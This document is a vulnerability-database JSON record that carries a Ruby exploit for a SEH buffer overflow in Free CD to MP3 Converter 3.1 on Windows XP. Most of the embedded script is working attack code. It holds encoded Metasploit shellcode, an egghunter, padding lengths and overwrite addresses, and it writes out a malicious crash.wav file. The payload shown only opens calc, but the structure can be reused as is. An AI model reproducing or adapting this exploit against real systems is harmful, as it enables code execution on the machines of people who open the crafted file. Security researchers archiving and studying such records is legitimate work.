Description
Exploit for the Windows platform, in the local exploits category
{"id": "1337DAY-ID-14788", "type": "zdt", "bulletinFamily": "exploit", "title": "Free CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)", "description": "Exploit for windows platform in category local exploits", "published": "2010-11-11T00:00:00", "modified": "2010-11-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/14788", "reporter": "C4SS!0 G0M3S", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T01:09:27", "viewCount": 11, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://0day.today/exploit/14788", "sourceData": "===========================================================\r\nFree CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)\r\n===========================================================\r\n\r\n# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (SEH)\r\n# Date: 10/18/10\r\n# Credit/Bug found by: C4SS!0 G0M3S\r\n# Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe\r\n# Version: 3.1\r\n# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)\r\n# CVE: N/A\r\n \r\n#! 
/usr/bin/env ruby\r\nfilename = 'crash.wav'\r\n \r\n# windows/exec - 144 bytes\r\n# http://www.metasploit.com\r\n# Encoder: x86/shikata_ga_nai\r\n# EXITFUNC=seh, CMD=calc\r\nshellcode = ''\r\nshellcode << \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\"\r\nshellcode << \"\\xd9\\x74\\x24\\xf4\\xb1\\x1e\\x58\\x31\\x78\"\r\nshellcode << \"\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\"\r\nshellcode << \"\\x30\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\"\r\nshellcode << \"\\xf3\\xb4\\xae\\x7d\\x02\\xaa\\x3a\\x32\\x1c\"\r\nshellcode << \"\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\"\r\nshellcode << \"\\xe7\\x96\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\"\r\nshellcode << \"\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\\xf0\\x27\"\r\nshellcode << \"\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\"\r\nshellcode << \"\\xf7\\x3b\\x7a\\xcf\\x4c\\x4f\\x23\\xd3\\x53\"\r\nshellcode << \"\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\\x1f\"\r\nshellcode << \"\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\"\r\nshellcode << \"\\xf5\\xc1\\x7e\\x98\\xf5\\xaa\\xf1\\x05\\xa8\"\r\nshellcode << \"\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\"\r\nshellcode << \"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\"\r\nshellcode << \"\\x59\\x90\\x7b\\xd7\\x05\\x7f\\xe8\\x7b\\xca\"\r\n \r\negghunter = ''\r\negghunter << \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\"\r\negghunter << \"\\x77\\x30\\x30\\x74\"\r\negghunter << \"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\"\r\n \r\njunk1 = 'A' * 4156\r\nnseh = [0x06eb9090].pack('V') # jmp short 6 byte\r\nseh = [0x00409F8C].pack('V') # cdextract.exe\r\nnops = \"\\x90\" * 50\r\njunk2 = 'B' * (10000 - (junk1 + nseh + seh + nops + egghunter + nops + \"w00tw00t\" + shellcode).length)\r\n \r\n# [junk1 'A'][nseh - short jmp)][seh -pop pop ret][nops][egghunter][nops]['w00tw00t'][shellcode][junk2 'B']\r\n# (2)| ^___________________|(1) ^(3)--> (4) (5)Tag found!--> (6) \r\n# |_________________________________|\r\n \r\nxploit = junk1 
+ nseh + seh + nops + egghunter + nops + \"w00tw00t\" + shellcode + junk2\r\n \r\nFile.open(filename,'w') do |fd|\r\n fd.write xploit\r\n puts \"xploit file size : #{xploit.length.to_s}\"\r\nend\r\n\r\n\n\n# 0day.today [2018-01-09] #", "_state": {"dependencies": 1645252018, "score": 1659766679, "epss": 1678812679}}